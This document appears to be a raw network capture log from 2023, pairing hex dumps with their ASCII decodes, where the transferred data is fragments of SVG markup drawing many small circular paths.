                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6404INData Raw: 22 20 64 3d 22 4d 33 35 39 2e 35 37 2c 32 39 37 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                        Data Ascii: " d="M359.57,297.08a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6420INData Raw: 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 37 37 2c 33 33 36 2e 33 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c
                                                                                                                                                                                                                                                        Data Ascii: .6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M393.77,336.36a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6436INData Raw: 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f
                                                                                                                                                                                                                                                        Data Ascii: 2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6452INData Raw: 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 35 37 2c 31 39 37 2e 30 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                        Data Ascii: .05,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M446.57,197.09a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6468INData Raw: 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 37 36 2c 32 33 36 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c
                                                                                                                                                                                                                                                        Data Ascii: .59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M480.76,236.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6484INData Raw: 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6500INData Raw: 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 34 32 2c 33 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                        Data Ascii: 0,1,.18,3.33"/><path class="cls-9" d="M549.42,323a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6516INData Raw: 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                        Data Ascii: 94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6532INData Raw: 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6548INData Raw: 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 36 31 2c 36 32 2e 37 39 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35
                                                                                                                                                                                                                                                        Data Ascii: 1,.15,2.67"/><path class="cls-9" d="M360.61,62.79a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6564INData Raw: 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 38 2e 30 35 2c 39 34 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                        Data Ascii: .47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M388.05,94.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6580INData Raw: 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 34 39 2c 31 32 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c
                                                                                                                                                                                                                                                        Data Ascii: .88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M415.49,125.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6596INData Raw: 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64
                                                                                                                                                                                                                                                        Data Ascii: 0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6612INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c
                                                                                                                                                                                                                                                        Data Ascii: 3,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6628INData Raw: 20 64 3d 22 4d 34 38 35 2e 33 2c 34 35 2e 35 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: d="M485.3,45.59a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6644INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 37 34 2c 37 37 2e 31 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ss="cls-9" d="M512.74,77.11a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6783INData Raw: 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2e 31 38 2c 31 30 38 2e 36 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 4,2.67"/><path class="cls-9" d="M540.18,108.63a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.
